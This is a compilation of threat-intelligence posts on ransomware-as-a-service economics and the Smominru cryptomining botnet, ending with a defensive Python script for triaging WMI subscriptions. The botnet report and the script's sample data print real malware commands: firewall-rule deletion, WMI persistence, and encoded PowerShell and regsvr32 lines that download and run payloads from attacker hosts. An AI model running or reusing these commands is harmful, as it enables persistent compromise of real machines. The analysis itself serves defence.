<p>Recently, the U.S. Department of Justice started its own Ransomware and Digital Extortion Task Force to target the "ransomware criminal ecosystem." DHS Secretary <a href="https://www.dhs.gov/news/2021/03/31/secretary-mayorkas-outlines-his-vision-cybersecurity-resilience">Mayorkas</a> also announced in March that the agency would conduct a 60-day "sprint" exercise focused on battling ransomware.</p>
<p>Red Sky Alliance has been analyzing and documenting cyber threats for 9 years and maintains a resource library of malware and cyber actor reports available at <a href="https://redskyalliance.org">https://redskyalliance.org</a> at no charge.</p>
<p>What can you do to better protect your organization today?</p>
<ul>
<li>All data in transmission and at rest should be encrypted.</li>
<li>Proper data back-up and off-site storage policies should be adopted and followed.</li>
<li>Implement 2-factor authentication company-wide.</li>
<li>For USA readers, join and become active in your local InfraGard chapter; there is no charge for membership. <a href="http://www.infragard.org">infragard.org</a></li>
<li>Update disaster recovery plans and emergency procedures with cyber threat recovery procedures, and test them.</li>
<li>Institute cyber threat and phishing training for all employees, with testing and updating.</li>
<li>Recommend/require cyber security software, services and devices to be used by all employees and consultants working from home.</li>
<li>Review and update your cyber threat and information security policies and procedures. Make them a part of all emergency planning and training.</li>
<li>Ensure that all software updates and patches are installed immediately.</li>
<li>Enroll your company/organization in RedXray for daily cyber threat notifications directed at your domains. The RedXray service is $500 a month and provides threat intelligence on nine (9) cyber threat categories, including keyloggers, without having to connect to your network.</li>
<li>Purchase annual cyber insurance coverage from Red Sky Alliance provided by Cysurance.</li>
</ul>
<p><a href="{{#staticFileLink}}8959864256,original{{/staticFileLink}}">TR-21-142-001_Crypto.pdf</a></p>
<p><span style="font-size:8pt;"><a href="https://www.bankinfosecurity.com/fighting-ransomware-call-for-cryptocurrency-regulation-a-16493?rf=2021-05-01__SUB_BIS__Slot1_ART16493&mkt_tok=MDUxLVpYSS0yMzcAAAF8xzX1dbUCS3ZNJ4Ry_xV7FJIKHIajke7WXhqs-hPHd-cMo0cnPDNlixMs3B85KCEfGygDUN7ajeu9RKQeULS-psnRHWpAAi9SBj7zWyhnmrGCeaY">https://www.bankinfosecurity.com/fighting-ransomware-call-for-cryptocurrency-regulation-a-16493?rf=2021-05-01__SUB_BIS__Slot1_ART16493&mkt_tok=MDUxLVpYSS0yMzcAAAF8xzX1dbUCS3ZNJ4Ry_xV7FJIKHIajke7WXhqs-hPHd-cMo0cnPDNlixMs3B85KCEfGygDUN7ajeu9RKQeULS-psnRHWpAAi9SBj7zWyhnmrGCeaY</a></span></p></div>Ransomware-as-a-Service went to Business Schoolhttps://redskyalliance.org/xindustry/ransomware-as-a-service-went-to-business-school2021-02-08T17:28:26.000Z2021-02-08T17:28:26.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}8532841253,original{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8532841253,RESIZE_400x{{/staticFileLink}}" width="250" alt="8532841253?profile=RESIZE_400x" /></a>A report published today by blockchain investigations firm Chainalysis confirms that cybercrime groups engaging in ransomware attacks don't operate in their own bubbles but often switch ransomware suppliers (RaaS services) in a search for better profits. The report analyzed how Bitcoin funds were transferred from victims to criminal groups, and how the money was divided among different parties involved in the ransomware attack, and how it was eventually laundered.</p>
<p>In today’s world, the ransomware landscape is very similar to how modern businesses operate. There are coders who create and rent out the actual ransomware strain via services called RaaS, or Ransomware-as-a-Service, similar to how most modern software is provided today. Some RaaS operators rent their ransomware to anyone who signs up, while others prefer to work with small groups of verified clients, usually called "affiliates." The affiliates are the actors who spread the ransomware via email or orchestrate intrusions into corporate or government networks, which they later infect and encrypt with the ransomware they rented from the RaaS operator.</p>
<p>In some cases, the affiliates are themselves made up of multiple actor groups: some specialize in breaching a company's network perimeter and are called initial access vendors, while others specialize in expanding this initial access inside the hacked network to maximize the ransomware's damage.</p>
<p>The ransomware landscape has evolved from previous years and is now a collection of multiple criminal groups, each providing its own highly-specialized service to one another, often across different RaaS providers.</p>
<p>The <a href="https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer">Chainalysis report</a> confirms these informal theories with indisputable and unforgeable cryptographic proof left behind by the Bitcoin transactions that have taken place among some of these groups. Chainalysis said it found evidence to suggest that an affiliate for the now-defunct Maze RaaS was also involved with SunCrypt RaaS. "We see that the Maze affiliate also sent funds, roughly 9.55 Bitcoin worth over $90,000, via an intermediary wallet to an address labeled 'Suspected SunCryptadmin,' which we've identified as part of a wallet that has consolidated funds related to a few different SunCrypt attacks," Chainalysis said.</p>
<p>"This suggests that the Maze affiliate is also an affiliate for SunCrypt, or possibly involved with SunCrypt in another way."</p>
<p>Similar findings also show a connection between the Egregor and DoppelPaymer operations. "In this case, we see that an Egregor wallet sent roughly 78.9 BTC worth approximately $850,000 to a suspected Doppelpaymer administrator wallet," researchers said. "Though we can't know for sure, we believe that this is another example of affiliate overlap. Our hypothesis is that the Egregor-labeled wallet is an affiliate for both strains sending funds to the Doppelpaymer administrators."</p>
<p>Chainalysis researchers also found evidence that the operators of the Maze and Egregor operations also used the same money-laundering service and over-the-counter brokers to convert stolen funds into fiat currency.</p>
<p>Since several security firms have suggested that the Egregor RaaS is a rebrand and continuation of the older and defunct Maze operation, such findings come to support these theories, showing how old Maze tactics permeated to the new Egregor operation. "Interesting report and very much aligns with what we are seeing," <a href="https://twitter.com/uuallan">Allan Liska</a>, a security researcher with threat intelligence firm Recorded Future, told ZDNet.</p>
<p>"Recorded Future is seeing more fluidity in the RaaS market now than at any other time in the (admittedly short) history of the RaaS market. Part of this is because of the reality that there is a growing stratification between the haves and have nots in ransomware. There are fewer actors making a lot of money, so ransomware actors are jumping from one RaaS to another to improve their chances of success," the Recorded Future analyst said. Liska says there are other connections and overlaps between other RaaS groups, and not just Maze, SunCrypt, and Egregor.</p>
<p>The Recorded Future analyst pointed to the Sodinokibi (aka REvil) RaaS operation as being one of the services where many groups overlap, primarily because the Sodinokibi administrator, an individual going by the name of Unknown, has often actively and openly recruited affiliates from other RaaS programs. But while we might view these connections and overlaps as a sign of successful cooperation between cybercrime groups, Chainalysis believes that this interconnectedness is actually a good sign for law enforcement. "The evidence suggests that the ransomware world is smaller than one may initially think given the number of unique strains currently operating," Chainalysis said.</p>
<p>In theory, this should make cracking down on and disrupting ransomware attacks a much easier task, since a carefully planned blow could impact multiple groups and RaaS providers at the same time. According to Chainalysis, these weak spots are the money-laundering and over-the-counter services that RaaS operators and their affiliates often use to convert their stolen funds into legitimate currency.</p>
<p>By taking out legitimate avenues for converting funds and reaching real-world profitability, Chainalysis believes RaaS operations would have a hard time seeing a reason to operate when they can't profit from their work.</p>
<p>Red Sky Alliance has been analyzing and documenting cyber threats for 9 years and maintains a resource library of malware and cyber actor reports available at <a href="https://redskyalliance.org">https://redskyalliance.org</a> at no charge.</p>
<p><a href="{{#staticFileLink}}8532841283,original{{/staticFileLink}}">TR-21-039-001_RaaS.pdf</a> </p>
</div>Smominru Botnethttps://redskyalliance.org/xindustry/smominru-botnet2019-04-03T18:14:36.000Z2019-04-03T18:14:36.000ZScott Hallhttps://redskyalliance.org/members/Scott<div><p><strong>Summary</strong></p><p>Beginning in August of 2017, a new cryptocurrency mining botnet, dubbed Smominru, started propagating via the recently leaked Eternal Blue exploit. Smominru, aka MyKings, is characterized by the targeting of Windows systems using WMI as a fileless persistence mechanism.<a rel="nofollow" href="#_ftn1" name="_ftnref1" id="_ftnref1">[1]</a></p><p>As of March 2019, Smominru showed no signs of slowing down. Wapack Labs has identified approximately 316K victims connecting to Smominru infrastructure over a period of 6 days. This report provides a high-level overview of the malware installation as well as details on the Smominru infrastructure and botnet.</p><p><strong>Details</strong></p><p>After the leak of NSA-developed exploits in 2017, several attackers incorporated them into malware campaigns. One of these came to be known as Smominru, a self-propagating botnet intended primarily for cryptocurrency mining. Smominru uses the Eternal Blue exploit<a rel="nofollow" href="#_ftn2" name="_ftnref2" id="_ftnref2">[2]</a> to infect systems and install a WMI payload. This payload triggers a number of additional commands and payload downloads, including the cryptocurrency miner as well as Mimikatz, a popular info stealer malware.</p><p><a href="{{#staticFileLink}}1757704822,RESIZE_1200x{{/staticFileLink}}" target="_blank" rel="noopener"><img class="align-center" src="{{#staticFileLink}}1757704822,RESIZE_710x{{/staticFileLink}}" width="710"/></a></p><p>Along with the WMI payload, Smominru then executes a large number of commands on the victim in order to prep the system. Among these are commands for killing processes and services, changing access rights, and reconfiguring the firewall. 
<a rel="nofollow" href="#_ftn1" name="_ftnref1" id="_ftnref1">[1]</a> Example commands:</p><table><tbody><tr><td width="623"><p>taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe…</p><p> </p><p>netsh advfirewall firewall delete rule name="tcp all" dir=in</p><p>netsh advfirewall firewall delete rule name="deny tcp 445" dir=in</p><p>netsh advfirewall firewall delete rule name="deny tcp 139" dir=in</p><p>netsh advfirewall firewall delete rule name="tcpall" dir=out</p><p> </p><p>cacls C:\Windows\debug\WIA\*.exe /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d everyone&cacls C:\Users\administrator\AppData\Roaming\Tempo /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d system&cacls C:\Users\Default\AppData\Roaming\Tempo\*.exe</p></td></tr></tbody></table><p> </p><p>The malware uses the WMI console commands (WMIC) to trigger additional downloads.</p><p> </p><table><tbody><tr><td width="623"><p>wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc \"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA==\"&powershell.exe IEX (New-Object 
system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:<a rel="nofollow" href="http://wmi.1217bye.host/1.txt">http://wmi.1217bye.host/1.txt</a> scrobj.dll&regsvr32 /u /s /i:<a rel="nofollow" href="http://173.208.139.170/2.txt">http://173.208.139.170/2.txt</a> scrobj.dll&regsvr32 /u /s /i:<a rel="nofollow" href="http://35.182.171.137/3.txt">http://35.182.171.137/3.txt</a> scrobj.dll"&wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckyoumm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckyoumm4\""</p></td></tr></tbody></table><p> </p><p>This also achieves persistence: the event filter named ‘fuckyoumm3’ fires every 10800 seconds and re-runs the bound consumer command. It is also a convenient way for the attacker to install additional malware on all of the bots, since they only need to switch out the hosted files. The Monero mining malware is finally installed; it connects to pool.minexmr.com to retrieve its configuration and begins mining.</p><p><strong>Infrastructure</strong></p><p>Smominru has used a number of different endpoints since it emerged in 2017. Its current network consists of a handful of IP addresses and domains. Most of the known domains share the same registrant email: billkillmenow@gmail.com. The domains follow the same loose naming convention, a combination of words and numbers. A couple of domains use the string ‘mykings’, which is an alias for Smominru. The domains use the Reg.ru registrar as well as the following state and country configurations:</p><p><strong>Registrant State/Province: msk</strong></p><p><strong>Registrant Country: BF</strong></p><p> </p><p>Several other domains use a registrant email address ira.malikova78@mail.ru. 
The Smominru actors tried to hide this email address behind a Whois protection service; however, it was identified by examining historic Whois records from before the protection was applied.</p><p>The following is an example Whois record:</p><table><tbody><tr><td width="623"><p>Domain Name: 1217BYE.HOST</p><p>Registry Domain ID: D87766657-CNIC</p><p>Registrar WHOIS Server: whois.reg.ru</p><p>Registrar URL: <a rel="nofollow" href="https://www.reg.ru/">https://www.reg.ru/</a></p><p>Updated Date: 2018-12-21T17:13:05.0Z</p><p>Creation Date: 2018-12-16T17:08:54.0Z</p><p>Registry Expiry Date: 2019-12-16T23:59:59.0Z</p><p>Registrar: Registrar of Domain Names REG.RU, LLC</p><p>Registrar IANA ID: 1606</p><p>Domain Status: ok <a rel="nofollow" href="https://icann.org/epp#ok">https://icann.org/epp#ok</a></p><p>Registrant Organization:</p><p>Registrant State/Province: msk</p><p>Registrant Country: BF</p><p>Registrant Phone: +7.4957654321</p><p>Registrant Email: billkillmenow@gmail.com</p><p>Admin Phone: +7.4957654321</p><p>Admin Email: billkillmenow@gmail.com</p><p>Tech Phone: +7.4957654321</p><p>Tech Email: billkillmenow@gmail.com</p><p>Name Server: NS1.REG.RU</p><p>Name Server: NS2.REG.RU</p><p>DNSSEC: unsigned</p><p>Billing Phone: +7.4957654321</p><p>Billing Email: billkillmenow@gmail.com</p><p>Registrar Abuse Contact Email: abuse@reg.ru</p><p>Registrar Abuse Contact Phone: +7.4955801111</p><p>URL of the ICANN Whois Inaccuracy Complaint Form: <a rel="nofollow" href="https://www.icann.org/wicf/">https://www.icann.org/wicf/</a></p><p>>>> Last update of WHOIS database: 2019-03-25T16:38:02.0Z <<<</p></td></tr></tbody></table><p> </p><p>The following table lists domains that are currently registered by Smominru actors.</p><p> </p><table width="582"><tbody><tr><td width="135"><p>VALUE</p></td><td width="129"><p>Created</p></td><td width="318"><p>Registration info</p></td></tr><tr><td width="135"><p>1217bye.host</p></td><td width="129"> 2018-12-16</td><td 
width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>1226bye.pw</p></td><td width="129"> 2018-12-26</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>1226bye.xyz</p></td><td width="129"> 2018-12-25</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>5b6b7b.info</p></td><td width="129"> 2017-01-21</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>down0116.info</p></td><td width="129"> 2018-01-16</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>ftp0118.info</p></td><td width="129"> 2018-01-18</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>ftp0930.host</p></td><td width="129"> 2018-09-30</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>ms1128.site</p></td><td width="129"> 2018-11-28</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>mykings.pw</p></td><td width="129"><p> 2018-04-11</p></td><td width="318"><p>Protected Whois. 
Initially observed registrant: ira.malikova78@mail.ru</p></td></tr><tr><td width="135"><p>mykings.xyz</p></td><td width="129"><p> </p></td><td width="318"><p>sinkholed</p></td></tr><tr><td width="135"><p>mys2018.xyz</p></td><td width="129"> 2018-03-23</td><td width="318"><p>Registrant State/Province: msk</p><p>Registrant Country: BF</p><p>Reg.ru</p></td></tr><tr><td width="135"><p>pc0416.xyz</p></td><td width="129"> 2018-04-16</td><td width="318"><p>Registrar URL: <a rel="nofollow" href="http://www.reg.com">http://www.reg.com</a></p><p> </p><p>Registrant State/Province: msk</p><p>Registrant Country: BF</p></td></tr><tr><td width="135"><p>wpd0126.info</p></td><td width="129"> </td><td width="318"><p>Registrant State/Province: msk</p><p>Registrant Country: BF</p><p>Reg.ru</p></td></tr><tr><td width="135"><p>upme0611.info</p></td><td width="129"> 2018-06-10</td><td width="318"><p>Registrant State/Province: msk</p><p>Registrant Country: BF</p><p>Reg.ru</p></td></tr><tr><td width="135"><p>649183ca17.pw</p></td><td width="129"><p>2018-09-03</p> </td><td width="318"><p>ira.malikova78@mail.ru</p><p> </p></td></tr><tr><td width="135"><p>8e627797f3.pw</p></td><td width="129"><p>2018-09-03</p> </td><td width="318"><p>ira.malikova78@mail.ru</p><p> </p></td></tr></tbody></table><p> </p><p>Wapack Labs identified 10 IP addresses currently being leveraged for Smominru’s command and control infrastructure. 
IP address 174.128.230.162, which is currently being leveraged for second-stage downloads, was by far the most frequently observed, with close to 300K unique IPs connecting.</p><table width="396"><tbody><tr><td width="258"><p><strong>Smominru C2 IP</strong></p></td><td width="138"><p><strong>Botnet Hits</strong></p></td></tr><tr><td width="258"><p>174.128.230.162</p></td><td width="138"><p>295230</p></td></tr><tr><td width="258"><p>45.58.135.106</p></td><td width="138"><p>69871</p></td></tr><tr><td width="258"><p>174.128.239.250</p></td><td width="138"><p>21202</p></td></tr><tr><td width="258"><p>66.117.6.174</p></td><td width="138"><p>1313</p></td></tr><tr><td width="258"><p>35.182.171.137</p></td><td width="138"><p>1107</p></td></tr><tr><td width="258"><p>64.32.3.186</p></td><td width="138"><p>1094</p></td></tr><tr><td width="258"><p>185.112.156.92</p></td><td width="138"><p>1088</p></td></tr><tr><td width="258"><p>223.25.247.240</p></td><td width="138"><p>511</p></td></tr><tr><td width="258"><p>173.208.139.170</p></td><td width="138"><p>353</p></td></tr><tr><td width="258"><p>208.110.71.194</p></td><td width="138"><p>316</p></td></tr></tbody></table><p> </p><p><strong>Botnet</strong></p><p>Wapack Labs analyzed traffic going to Smominru infrastructure over the course of 6 days and identified 316K unique IPs that are likely compromised with the Smominru coinminer. The vast majority were in AS4134 (No.31, Jin-rong Street), which is the top botnet ASN across the board.</p><p><a href="{{#staticFileLink}}1757720157,RESIZE_710x{{/staticFileLink}}" target="_blank" rel="noopener"><img class="align-center" src="{{#staticFileLink}}1757720157,RESIZE_710x{{/staticFileLink}}" width="604"/></a></p><p> </p><p>Geolocation of the Smominru bots revealed China and Russia to be the top two origins, with roughly the same number of bots each. Figure 3 
shows the breakdown of bots by country.</p><p><a href="{{#staticFileLink}}1757723126,RESIZE_710x{{/staticFileLink}}" target="_blank" rel="noopener"><img class="align-center" src="{{#staticFileLink}}1757723126,RESIZE_710x{{/staticFileLink}}" width="438"/></a></p><p> </p><p><strong>Conclusion</strong></p><p>Cryptocurrency mining botnets such as Smominru are especially problematic because not only can they lead to data loss, but they also consume most of the processing power on an infected system. This also increases power consumption and greatly degrades the performance of the infected machine. Despite emergency patches issued by Microsoft, millions of systems still remained vulnerable to Eternal Blue as of late 2018. So long as machines are unpatched, they are at risk of being recruited by Smominru.</p><p><a rel="nofollow" href="#_ftnref1" name="_ftn1" id="_ftn1">[1]</a> <a rel="nofollow" href="https://www.virustotal.com/#/file/85aded78821dafa60971ce19201bea3f34bbadb64b81ef882b406f8312abfa4a/detection">https://www.virustotal.com/#/file/85aded78821dafa60971ce19201bea3f34bbadb64b81ef882b406f8312abfa4a/detection</a></p><p> </p><p><a rel="nofollow" href="#_ftnref1" name="_ftn1" id="_ftn1">[1]</a> <a rel="nofollow" href="https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly/">https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly/</a></p><p><a rel="nofollow" href="#_ftnref2" name="_ftn2" id="_ftn2">[2]</a> <a rel="nofollow" href="https://en.wikipedia.org/wiki/EternalBlue">https://en.wikipedia.org/wiki/EternalBlue</a></p></div>
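The WMI persistence described in the Details section (a perf-counter __EventFilter with a long WITHIN interval bound to a CommandLineEventConsumer that launches encoded PowerShell and regsvr32 scriptlets) is what a defender should hunt for in the root\subscription namespace. The following Python triage routine is an added example, not code from the report or from Wapack Labs: the record layout (filter_query, consumer_name, consumer_cmd) and the function names are assumptions, and the sample records are constructed, the first reusing the filter query, consumer name and encoded command quoted above and the second a benign placeholder.

```python
import base64
import re

# Indicators drawn from the consumer command line quoted in the report.
SUSPICIOUS_PATTERNS = [
    (r"powershell(?:\.exe)?\s+.*-(?:nop|noprofile)\b", "powershell -nop"),
    (r"-(?:e|ec|enc|encodedcommand)\s+['\"]?[A-Za-z0-9+/=]{20,}", "encoded powershell"),
    (r"\bIEX\b|Invoke-Expression", "IEX"),
    (r"DownloadString|DownloadFile", "WebClient download"),
    (r"regsvr32\s+.*/i:https?://.*scrobj\.dll", "regsvr32 scrobj.dll (remote scriptlet)"),
]
URL_RE = re.compile(r"https?://[^\s'\"<>&|)]+")

def decode_encoded_powershell(cmdline):
    """Return the plaintext of every -enc/-EncodedCommand blob (base64 of UTF-16LE)."""
    out = []
    for m in re.finditer(r"-(?:e|ec|enc|encodedcommand)\s+['\"]?([A-Za-z0-9+/=]{20,})", cmdline, re.I):
        try:
            out.append(base64.b64decode(m.group(1)).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            out.append("<undecodable>")
    return out

def triage_subscription(sub):
    """Score one filter/consumer pair; returns indicator hits, URLs and decoded payloads."""
    cmd = sub["consumer_cmd"]
    hits = [label for pat, label in SUSPICIOUS_PATTERNS if re.search(pat, cmd, re.I)]
    decoded = decode_encoded_powershell(cmd)
    urls = sorted(set(URL_RE.findall(cmd + " " + " ".join(decoded))))
    # A modification event on a perf counter with a long WITHIN interval is a
    # timer in disguise (the report's filter polls every 10800 seconds).
    query = sub["filter_query"]
    m = re.search(r"WITHIN\s+(\d+)", query, re.I)
    if m and "Win32_PerfFormattedData" in query and int(m.group(1)) >= 600:
        hits.append("timer-style filter every %ss" % m.group(1))
    return {"name": sub["consumer_name"], "hits": hits, "urls": urls, "decoded": decoded}

def triage_all(subs):
    return [triage_subscription(s) for s in subs]

# Constructed sample records (hypothetical collector output); the encoded blob is the one quoted in the report.
ENC = "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="
SAMPLE_SUBSCRIPTIONS = [
    {"filter_query": "SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",
     "consumer_name": "fuckyoumm4",
     "consumer_cmd": 'cmd /c powershell.exe -nop -enc "' + ENC + '"&powershell.exe IEX (New-Object '
                     "system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')"
                     "||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll"},
    {"filter_query": "SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent'",
     "consumer_name": "rotate-logs", "consumer_cmd": r"C:\Scripts\rotate-logs.cmd"},
]

if __name__ == "__main__":
    for r in triage_all(SAMPLE_SUBSCRIPTIONS):
        print(r["name"], "->", ", ".join(r["hits"]) or "no indicators", r["urls"])
```

On a live host the same records can be collected by enumerating __EventFilter, CommandLineEventConsumer and __FilterToConsumerBinding in root\subscription; the decoded blob shows the staging URL that the plain command line hides.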